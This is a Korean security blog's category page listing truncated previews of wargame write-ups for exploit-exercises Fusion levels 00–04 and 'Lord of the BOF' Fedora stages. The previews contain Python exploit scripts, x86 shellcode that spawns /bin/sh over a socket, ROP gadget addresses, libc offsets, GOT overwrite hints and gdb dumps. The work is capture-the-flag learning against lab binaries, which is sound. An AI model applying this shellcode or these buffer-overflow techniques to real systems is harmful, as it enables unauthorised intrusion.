본문 바로가기

Computer Security/WarGame

[exploit-exercises] Fusion level 04 from socket import * import time import base64 from struct import * base_addr = 0xb782970d - 0x170d # get from stack smashing information libc_base = 0xb7698113 - 0xf3 - 0x19020 # get from stack smashing information read = base_addr + 0xd20 system = libc_base + 0x3cb20 pppr = base_addr + 0x19ba bss = base_addr + 0x4240 + 0x300 # password check """ lists = range(ord('0'),ord('9')+1) + range(ord('.. 더보기
[exploit-exercises] Fusion level 03 from socket import * from struct import * import hmac from hashlib import sha1 # contents: 0x804bdf4 # 0804: 0x8048584+7 # 8f: 804bda4+1 # 30: 80482a4 rand_plt = 0x08048f30 rand_got = 0x804bd98 memcpy = 0x8048e60 gContents = 0x804bdf4 ppppr = 0x804a26c pop_ebx = 0x8049402 # pop ebx ; pop ebp ;; pop_eax = 0x8049b4f # pop eax ; add esp 0x5c ;; add_eax_ebx = 0x80493f9 # add eax 0x804bde4 ; add [ebx.. 더보기
[exploit-exercises] Fusion level 02 from socket import * from struct import * import time def cipher(s,key): i=0 after="" while i 더보기
[exploit-exercises] Fusion level 01 from struct import * from socket import * import time fd=4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # bin/sh shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\ "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',20001)) #raw_input(".. 더보기
[exploit-exercises] Fusion level 00 from struct import * from socket import * import time fd=4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # bin/sh shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\ "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',20000)) print s.recv.. 더보기
[exploit-exercises] ssh setting 처음에 putty로 ssh 접속을 못해서 좀 해맸는데,우선 root권한으로(또는 sudo) 접속한후,# ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key# ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key를 해줘야 putty로 접속 가능하다. 더보기
[BOF원정대/Fedora4] cruel -> enigma 0x080485e0 : mov 0x804985c,%eax 0x080485e5 : sub $0x4,%esp 0x080485e8 : push %eax 0x080485e9 : push $0x400 0x080485ee : lea 0xfffffc00(%ebp),%eax 0x080485f4 : push %eax 0x080485f5 : call 0x80483ec ... (gdb) x/x 0x804985c 0x804985c : 0x00236740 (gdb) x/10x 0x00236740 0x236740 : 0xfbad2098 0xb7fe1000 0xb7fe1000 0xb7fe1000 0x236750 : 0xb7fe1000 0xb7fe1000 0xb7fe1000 0xb7fe1000 0x236760 : 0xb7fe2000.. 더보기
[BOF원정대/Fedora4] dark_stone -> cruel /* The Lord of the BOF : The Fellowship of the BOF - cruel - Local BOF on Fedora Core 4 - hint : no more fake ebp, RET sleding on random library */ #include #include #include int main(int argc, char *argv[]) { char buffer[256]; if(argc & result $ xxd result | grep cve -A 4 ... 0000640: 6563 7665 2822 85c0 7553 65a1 5422 2c20 ecve("..uSe.T", 0000650: 5b30 5d2c 205b 2f2a 2030 2076 6172 7320 [0], [.. 더보기
[BOF원정대/Fedora3] evil_wizard -> dark_stone /* The Lord of the BOF : The Fellowship of the BOF - dark_stone - Remote BOF on Fedora Core 3 - hint : GOT overwriting again - port : TCP 8888 */ #include // magic potion for you void pop_pop_ret(void) { asm("pop %eax"); asm("pop %eax"); asm("ret"); } int main() { char buffer[256]; char saved_sfp[4]; int length; char temp[1024]; printf("dark_stone : how fresh meat you are!\n"); printf("you : ");.. 더보기
[BOF원정대/Fedora3] hell_fire -> evil_wizard /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard - Local BOF on Fedora Core 3 - hint : GOT overwriting */ // magic potion for you void pop_pop_ret(void) { asm("pop %eax"); asm("pop %eax"); asm("ret"); } int main(int argc, char *argv[]) { char buffer[256]; char saved_sfp[4]; int length; if(argc 더보기